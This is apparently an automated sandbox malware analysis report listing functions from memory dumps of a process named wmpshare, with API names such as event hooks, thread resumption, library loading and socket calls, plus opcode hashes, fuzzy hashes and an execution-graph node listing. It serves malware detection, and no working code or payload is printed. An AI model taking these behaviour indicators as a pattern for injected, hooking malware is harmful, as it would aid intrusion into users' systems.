                                                                                                                                                                                          • Source File: 00000018.00000002.2946822319.00000286F6081000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000286F6081000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_286f6081000_wmpshare.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: InformationVolume
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2039140958-0
                                                                                                                                                                                          • Opcode ID: ab88d9938b3b72962f423333e66c75964dea025bf306d4a69d18b2f71a512dba
                                                                                                                                                                                          • Instruction ID: ed2e34b55dbea56ed5e59ef78f5087e4f85d865717f23aa12b6c1cb13fb4315b
                                                                                                                                                                                          • Opcode Fuzzy Hash: ab88d9938b3b72962f423333e66c75964dea025bf306d4a69d18b2f71a512dba
                                                                                                                                                                                          • Instruction Fuzzy Hash: 75415D3515C6488BE76AEB24D9987DBB3E1FFA4304F508A1DA18BC3196EF74D604CB42
                                                                                                                                                                                          Function 00007DF4656334A8 Relevance: 1.6, APIs: 1, Instructions: 89COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.2954154781.00007DF465631000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF465631000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_7df465631000_wmpshare.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: EventHook
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3661607649-0
                                                                                                                                                                                          • Opcode ID: 5a2bbfa698742b6cae5652eefc388705153c62446812716ece3234e1382db74d
                                                                                                                                                                                          • Instruction ID: 8c40e370037bd7f1fc7ba4b5bc542fafa6d4f149da39f5e95ed9eb43dc8a23ab
                                                                                                                                                                                          • Opcode Fuzzy Hash: 5a2bbfa698742b6cae5652eefc388705153c62446812716ece3234e1382db74d
                                                                                                                                                                                          • Instruction Fuzzy Hash: BD31A2B1618A498FEB55EF25C4899A673F0FF64321F10163EE04FC3291DB38A842CB41
                                                                                                                                                                                          Function 00000286F608CEE0 Relevance: 1.6, APIs: 1, Instructions: 55fileCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.2946822319.00000286F6081000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000286F6081000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_286f6081000_wmpshare.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FileRead
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2738559852-0
                                                                                                                                                                                          • Opcode ID: 692895d7e566b00515affad7a4510cba5330249c96600c383c0354dec883b266
                                                                                                                                                                                          • Instruction ID: 5debbebeff1ca8ed18acc4431a0da97fc88ce52e5bfd751d558ce29866c2991b
                                                                                                                                                                                          • Opcode Fuzzy Hash: 692895d7e566b00515affad7a4510cba5330249c96600c383c0354dec883b266
                                                                                                                                                                                          • Instruction Fuzzy Hash: F301C87120850C8FD741EF28E8895A973E9FBE8304F50462AE54AC2551DF34DA158781
                                                                                                                                                                                          Function 00000286F6082908 Relevance: 1.6, APIs: 1, Instructions: 52threadCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.2946822319.00000286F6081000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000286F6081000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_286f6081000_wmpshare.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ResumeThread
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 947044025-0
                                                                                                                                                                                          • Opcode ID: eb8efb70a255d3993e3c222089937f44c28cf696e92b085bcc04ab88a5b55cd8
                                                                                                                                                                                          • Instruction ID: 51de17031352e7d1e707fe661fe2c405035b2d834ca1221b3ba2c4e576617bf4
                                                                                                                                                                                          • Opcode Fuzzy Hash: eb8efb70a255d3993e3c222089937f44c28cf696e92b085bcc04ab88a5b55cd8
                                                                                                                                                                                          • Instruction Fuzzy Hash: EC01F23560990A8FEB54EB39EE8C62533D5EB99311B548064E80EC3165DA39D842CB84
                                                                                                                                                                                          Function 00007DF465603CDC Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.2953646461.00007DF465601000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF465601000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_7df465601000_wmpshare.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: EventHook
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3661607649-0
                                                                                                                                                                                          • Opcode ID: 7e614b85896ac0b1141b176719915ed43944beda22e6c339024177dd55c03ccc
                                                                                                                                                                                          • Instruction ID: df5828709aa4c4346c5fa759e8069fe6ba0ca5f0eb3be13542de9443a97636aa
                                                                                                                                                                                          • Opcode Fuzzy Hash: 7e614b85896ac0b1141b176719915ed43944beda22e6c339024177dd55c03ccc
                                                                                                                                                                                          • Instruction Fuzzy Hash: F9116DB0A1DA459AF764AB248955BAB72B0FF14315F50163DD04FC12D2DB6CB44ACB41
                                                                                                                                                                                          Function 00000286F608BEF0 Relevance: 1.5, APIs: 1, Instructions: 48libraryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.2946822319.00000286F6081000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000286F6081000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_286f6081000_wmpshare.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: LibraryLoad
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1029625771-0
                                                                                                                                                                                          • Opcode ID: abc4bbe606b124008aec48ef764282d5b057ec30dc72963a0fbe36d295726b2e
                                                                                                                                                                                          • Instruction ID: 827d01fbff069076332d054588b4406b470a6b4cd8218edd1a4f5dab1c9daf08
                                                                                                                                                                                          • Opcode Fuzzy Hash: abc4bbe606b124008aec48ef764282d5b057ec30dc72963a0fbe36d295726b2e
                                                                                                                                                                                          • Instruction Fuzzy Hash: 9D01F438219A4C4FF745EB38995D77A32D6EFB9301F20857AA00BC32E3EE28C8048741
                                                                                                                                                                                          Function 00000286F6082B54 Relevance: 1.5, APIs: 1, Instructions: 33memoryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.2946822319.00000286F6081000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000286F6081000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_286f6081000_wmpshare.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CreateHeap
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 10892065-0
                                                                                                                                                                                          • Opcode ID: 897fafeead847303cd79d11afed6f4c8d1267b1295cf91a495235683339b4e9f
                                                                                                                                                                                          • Instruction ID: 0b8c110bec4657307a1b27b33d310f9f31a0799d18850d631f401862e5725fa8
                                                                                                                                                                                          • Opcode Fuzzy Hash: 897fafeead847303cd79d11afed6f4c8d1267b1295cf91a495235683339b4e9f
                                                                                                                                                                                          • Instruction Fuzzy Hash: A4F0A76561FA064BF754EF767F8C2152651DB54312F74893A9607C75A2DD39C8814380
                                                                                                                                                                                          Function 00000286F60869B8 Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.2946822319.00000286F6081000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000286F6081000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_286f6081000_wmpshare.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressCallerProc
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2663294120-0
                                                                                                                                                                                          • Opcode ID: d995070f4c000868ee4da6d9934e01647bf6d928269a01321783332ab5c3360a
                                                                                                                                                                                          • Instruction ID: d29de4343cfb88036ebef5053a39210a80d334909a86c3bf500af9047e3e7daf
                                                                                                                                                                                          • Opcode Fuzzy Hash: d995070f4c000868ee4da6d9934e01647bf6d928269a01321783332ab5c3360a
                                                                                                                                                                                          • Instruction Fuzzy Hash: 86E0C211719C190BAB78A2BE248D67751C6CBEC172B24427BF51EC32A6ED50CC814390
                                                                                                                                                                                          Function 00007DF4655F1290 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000003.2722216949.00007DF4655F1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4655F1000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_3_7df4655f1000_wmpshare.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FunctionTable
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1252446317-0
                                                                                                                                                                                          • Opcode ID: fc492990cf9c193ed0fed28dab1318ef1c2e9243cee28bd6a774944ac56baf31
                                                                                                                                                                                          • Instruction ID: c158d278a51f92f17a85306fee9893267028f597cc618fccd3300330704128c3
                                                                                                                                                                                          • Opcode Fuzzy Hash: fc492990cf9c193ed0fed28dab1318ef1c2e9243cee28bd6a774944ac56baf31
                                                                                                                                                                                          • Instruction Fuzzy Hash: 5AE0DF709009044BEB98E69DC84DB903AE0EB4830AF604269D104C9294CB39849BCF81
                                                                                                                                                                                          Function 00007DF465601708 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.2953646461.00007DF465601000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF465601000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_7df465601000_wmpshare.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FunctionTable
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1252446317-0
                                                                                                                                                                                          • Opcode ID: e917f39a39c33fe414eade99d1458f0d2d3e05fe92a720ed8b0375ca766d8558
                                                                                                                                                                                          • Instruction ID: 7e5d832409b2fa6d0436c061a2b00387e6813d527a5543436cc7c3df78d6698e
                                                                                                                                                                                          • Opcode Fuzzy Hash: e917f39a39c33fe414eade99d1458f0d2d3e05fe92a720ed8b0375ca766d8558
                                                                                                                                                                                          • Instruction Fuzzy Hash: 8FE04F705009094BEB98D61DC9497A036E0EB5830AF604269D409CA291CB39949BCF81
                                                                                                                                                                                          Function 00007DF465651290 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.2954481861.00007DF465651000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF465651000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_7df465651000_wmpshare.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FunctionTable
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1252446317-0
                                                                                                                                                                                          • Opcode ID: cff89ce48d21670ef986fb34dbe231ab83686b2b911df37c38ad495f9c0b2048
                                                                                                                                                                                          • Instruction ID: 0b785eb538f6652d0b02991908db8bd27ca177e1a7d389e6f7c7b8033d499225
                                                                                                                                                                                          • Opcode Fuzzy Hash: cff89ce48d21670ef986fb34dbe231ab83686b2b911df37c38ad495f9c0b2048
                                                                                                                                                                                          • Instruction Fuzzy Hash: 6BE04F309449055BEBA8DA1DC809B9036E0EB5C30AFA04669D509C9291CB39D8DBCF81
                                                                                                                                                                                          Function 00000286F6083C88 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.2946822319.00000286F6081000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000286F6081000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_286f6081000_wmpshare.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FunctionTable
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1252446317-0
                                                                                                                                                                                          • Opcode ID: e973a519ee2ebc5e911fb478164db4f9dda36e27b6cb7c6046375041e7ff95af
                                                                                                                                                                                          • Instruction ID: 93855b8dd650ed696ab88fced05539d8239e83660b4e39c12b44254b6c5e9df8
                                                                                                                                                                                          • Opcode Fuzzy Hash: e973a519ee2ebc5e911fb478164db4f9dda36e27b6cb7c6046375041e7ff95af
                                                                                                                                                                                          • Instruction Fuzzy Hash: 0FE04F341029054BEFACDB6DC94D3503AD0EB98316F648258D505C9292CB39C8ABCF82
                                                                                                                                                                                          Function 00000286F60874F0 Relevance: 1.5, APIs: 1, Instructions: 276COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.2946822319.00000286F6081000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000286F6081000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_286f6081000_wmpshare.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FreeVirtual
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1263568516-0
                                                                                                                                                                                          • Opcode ID: 306f73362989c91bfaffd3666fa505f5868a1dafee964194c29bb12492c75fc6
                                                                                                                                                                                          • Instruction ID: c9f2aeaf946044b09ad52c3e76b1a8486f6ae112447e79066e5fb33e6a9515c6
                                                                                                                                                                                          • Opcode Fuzzy Hash: 306f73362989c91bfaffd3666fa505f5868a1dafee964194c29bb12492c75fc6
                                                                                                                                                                                          • Instruction Fuzzy Hash: 2591713421DA098FDB45EF28D58DAEA73E1FF64300F548569E44BC75AADE30E841CB81
                                                                                                                                                                                          Function 00007DF465631708 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.2954154781.00007DF465631000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF465631000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_7df465631000_wmpshare.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FunctionTable
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1252446317-0
                                                                                                                                                                                          • Opcode ID: 18eb6388586fc4d6c2a3579563bef3692ffb62769f7eb08bbe6ffb4e199480d7
                                                                                                                                                                                          • Instruction ID: b412c7445aa7e6275c35c78f1e766359081d6348a26d7eeaa87a80bffa135652
                                                                                                                                                                                          • Opcode Fuzzy Hash: 18eb6388586fc4d6c2a3579563bef3692ffb62769f7eb08bbe6ffb4e199480d7
                                                                                                                                                                                          • Instruction Fuzzy Hash: 59E04F705009054BEBA8D71DC84D7903AF0EB58306F644269D409CA291CB3D949BCF81
                                                                                                                                                                                          Function 00000286F608698C Relevance: 1.5, APIs: 1, Instructions: 24libraryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.2946822319.00000286F6081000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000286F6081000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_286f6081000_wmpshare.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: LibraryLoad
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1029625771-0
                                                                                                                                                                                          • Opcode ID: deadc42d593f6e2d9e8bf000e5cc548490ab76c2dd2841c06e942c08cce04583
                                                                                                                                                                                          • Instruction ID: a1f6079f1f404640731ec62cb5463778f3a3cee4b58872546ceef9a2828a0c9d
                                                                                                                                                                                          • Opcode Fuzzy Hash: deadc42d593f6e2d9e8bf000e5cc548490ab76c2dd2841c06e942c08cce04583
                                                                                                                                                                                          • Instruction Fuzzy Hash: 1DD0A720325D0D0BEA5CA37D2C9D72511DAEBDC221F64417AB50BC2282DD58CC550340
                                                                                                                                                                                          Function 00000286F608C994 Relevance: 1.5, APIs: 1, Instructions: 272COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.2946822319.00000286F6081000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000286F6081000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_286f6081000_wmpshare.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: freemalloc
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3061335427-0
                                                                                                                                                                                          • Opcode ID: 95e0b7105a60c66ccf3cf853b29ca3c02cf426d78340e81cc55da608d90ff99a
                                                                                                                                                                                          • Instruction ID: d742b4a77a7dfa7bd3db659e56ac63fb60df3eca4163375eb21b70874d74868e
                                                                                                                                                                                          • Opcode Fuzzy Hash: 95e0b7105a60c66ccf3cf853b29ca3c02cf426d78340e81cc55da608d90ff99a
                                                                                                                                                                                          • Instruction Fuzzy Hash: 3391513511DA484BD765EF24E9897EAB3E1FFA4300F108A2EE18BC3596DE34D9458782
                                                                                                                                                                                          Function 00000286F608A7E0 Relevance: 1.4, APIs: 1, Instructions: 139COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.2946822319.00000286F6081000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000286F6081000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_286f6081000_wmpshare.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: malloc
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2803490479-0
                                                                                                                                                                                          • Opcode ID: 476d1573ced0e4e7d90478b065ffce6f5161857ad511bc77908c61c20efb894b
                                                                                                                                                                                          • Instruction ID: 1a28c8caa44478209f7c322a4262ed5f6df429bfa84429000a1916f60f67721b
                                                                                                                                                                                          • Opcode Fuzzy Hash: 476d1573ced0e4e7d90478b065ffce6f5161857ad511bc77908c61c20efb894b
                                                                                                                                                                                          • Instruction Fuzzy Hash: EA416231219D0E8FDB84EF2CD98CA65B7E0FB78311B10466AD40AC3A65DB70E895CBC1
                                                                                                                                                                                          Function 00000286F608AA34 Relevance: 1.3, APIs: 1, Instructions: 91COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.2946822319.00000286F6081000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000286F6081000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_286f6081000_wmpshare.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: malloc
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2803490479-0
                                                                                                                                                                                          • Opcode ID: eec3f8602b782a310c407d5c0930936ea6b1e134b4aff90934b64d7b708088a2
                                                                                                                                                                                          • Instruction ID: 6671055702c16e903136ea3c27e9eb2f14c8d213096957d12b6c1764d63ee9e9
                                                                                                                                                                                          • Opcode Fuzzy Hash: eec3f8602b782a310c407d5c0930936ea6b1e134b4aff90934b64d7b708088a2
                                                                                                                                                                                          • Instruction Fuzzy Hash: C021A571215D1C8FDB49EF1CD88C7A177E5FB68311B1442A7D80ACB665DE34D885C781
                                                                                                                                                                                          Function 00007DF46561063C Relevance: 1.3, APIs: 1, Instructions: 54COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.2953646461.00007DF465601000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF465601000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_7df465601000_wmpshare.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: free
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1294909896-0
                                                                                                                                                                                          • Opcode ID: 824716752341d80b75d8ee6151b82c4d32d575334c5b2856fbabe19722d7ec18
                                                                                                                                                                                          • Instruction ID: 7ee74fc286a6224789a3aabd8d54ae67109390cd2eefa5ce86126e2c88ea2a98
                                                                                                                                                                                          • Opcode Fuzzy Hash: 824716752341d80b75d8ee6151b82c4d32d575334c5b2856fbabe19722d7ec18
                                                                                                                                                                                          • Instruction Fuzzy Hash: 05111E706049558FEF75AF6D84947B636E0EF98321F04027BE80ECA299CB749C94C6D1
                                                                                                                                                                                          Function 00000286F609DBCC Relevance: 1.3, APIs: 1, Instructions: 54COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.2946822319.00000286F6081000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000286F6081000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_286f6081000_wmpshare.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: free
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1294909896-0
                                                                                                                                                                                          • Opcode ID: 5fbeb56ece995088b76dd5c21d54cad8e0ac5a6ba9f78397ae3b26e7a6714c4d
                                                                                                                                                                                          • Instruction ID: c787fc15bfeec99da86d11450abf9f852b4f602a8beada78e2084290e49fedf9
                                                                                                                                                                                          • Opcode Fuzzy Hash: 5fbeb56ece995088b76dd5c21d54cad8e0ac5a6ba9f78397ae3b26e7a6714c4d
                                                                                                                                                                                          • Instruction Fuzzy Hash: 9C11A574145D198FFF649F19958C36432D1EF64319F24427AE90ACA2DACF70CC44C791
                                                                                                                                                                                          Function 00000286F60C4C3C Relevance: 1.3, APIs: 1, Instructions: 42COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.2946822319.00000286F6081000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000286F6081000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_286f6081000_wmpshare.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: free
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1294909896-0
                                                                                                                                                                                          • Opcode ID: 5a17d2a82900e38e66e0587de357cfea25c88adc918405c2cab64094945da2f0
                                                                                                                                                                                          • Instruction ID: fac55722de743ef644d2eae6fbfa6eafc83c8531ac9710d0826c70fce24692ad
                                                                                                                                                                                          • Opcode Fuzzy Hash: 5a17d2a82900e38e66e0587de357cfea25c88adc918405c2cab64094945da2f0
                                                                                                                                                                                          • Instruction Fuzzy Hash: 3DF04960211D0A4FEFD4EB6994D8B2533D4FF68358F609654991BC65E6DA22CC82C750
                                                                                                                                                                                          Function 00000286F608A9D4 Relevance: 1.3, APIs: 1, Instructions: 42COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.2946822319.00000286F6081000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000286F6081000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_286f6081000_wmpshare.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: free
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1294909896-0
                                                                                                                                                                                          • Opcode ID: f3ea22a6fa7cbad43c7f75ab5131f91595a366188be7b26cc18e59d3410828da
                                                                                                                                                                                          • Instruction ID: 7b0d89b927744642eb260538ae5a5189cd6ed52f63df128e584a20c3020b6081
                                                                                                                                                                                          • Opcode Fuzzy Hash: f3ea22a6fa7cbad43c7f75ab5131f91595a366188be7b26cc18e59d3410828da
                                                                                                                                                                                          • Instruction Fuzzy Hash: 4FF0177421AE0A8FEB88EF29D59C76073E4FB68306F744179960AC29A1DB75CC94CB01

                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                          Execution Coverage:2.5%
                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                          Signature Coverage:0%
                                                                                                                                                                                          Total number of Nodes:193
                                                                                                                                                                                          Total number of Limit Nodes:5
                                                                                                                                                                                          execution_graph 13962 1fc540a95a4 13963 1fc540a95b3 13962->13963 13965 1fc540a95d6 13962->13965 13963->13965 13966 1fc540a8024 13963->13966 13967 1fc540a7ef0 3 API calls 13966->13967 13968 1fc540a806d 13967->13968 13968->13965 13973 1fc540831dc 13974 1fc540831f9 13973->13974 13975 1fc54083203 13974->13975 13978 1fc54083218 13974->13978 13976 1fc540846c4 free 13975->13976 13977 1fc5408320b 13976->13977 13982 1fc54084350 13978->13982 13980 1fc540832a7 13986 1fc54084864 13980->13986 13983 1fc54084368 13982->13983 13989 1fc54089d58 13983->13989 13985 1fc540843c0 13985->13980 13987 1fc54087fcc free 13986->13987 13988 1fc54084877 13987->13988 13988->13977 13990 1fc54089d80 13989->13990 13991 1fc54089b84 free 13990->13991 13992 1fc54089d8c 13990->13992 13991->13992 13992->13985 13789 1fc540a6f3c SetErrorMode 13790 1fc540a6f50 13789->13790 13791 1fc540aa516 socket 13790->13791 13792 1fc540aa5a3 socket 13791->13792 13793 1fc540aa55a getsockopt 13791->13793 13795 1fc540aa5c3 13792->13795 13793->13792 13822 1fc540828a0 13823 1fc540828bc 13822->13823 13824 1fc540828ca 13823->13824 13825 1fc540828c1 GetProcAddressForCaller 13823->13825 13825->13824 13841 1fc54084480 13842 1fc5408449a 13841->13842 13843 1fc540844da 13842->13843 13845 1fc54084224 13842->13845 13846 1fc5408429c 13845->13846 13847 1fc5408423b 13845->13847 13846->13843 13847->13846 13849 1fc5408aacc 13847->13849 13850 1fc5408aaec 13849->13850 13854 1fc5408acb8 13849->13854 13850->13854 13858 1fc54089ef4 13850->13858 13854->13847 13855 1fc5408ab18 13855->13854 13857 1fc54087fcc free 13855->13857 13866 1fc54089b84 13855->13866 13857->13855 13859 1fc54089f04 13858->13859 13861 1fc54089f5e 13858->13861 13859->13861 13870 1fc54089eac 13859->13870 13861->13854 13861->13855 13862 1fc54087fcc 13861->13862 13863 1fc54087fdc 13862->13863 13865 1fc54087ff9 13862->13865 13863->13865 13876 1fc54087f9c 13863->13876 13865->13855 13867 1fc54089b9b 13866->13867 13868 1fc540880cc free 13867->13868 13869 1fc54089bae 13867->13869 13868->13869 13869->13855 13871 1fc54089ee7 13870->13871 13872 1fc54089eba 13870->13872 13871->13861 13872->13871 13873 1fc54089ed1 13872->13873 13875 1fc54089b84 free 13872->13875 13873->13871 13874 1fc54087fcc free 13873->13874 13874->13871 13875->13873 13877 1fc54087faa 13876->13877 13879 1fc54087fc0 13876->13879 13877->13879 13880 1fc5408f1f4 13877->13880 13879->13863 13881 1fc5408f208 13880->13881 13883 1fc5408f247 13880->13883 13881->13883 13884 1fc54089aac 13881->13884 13883->13879 13885 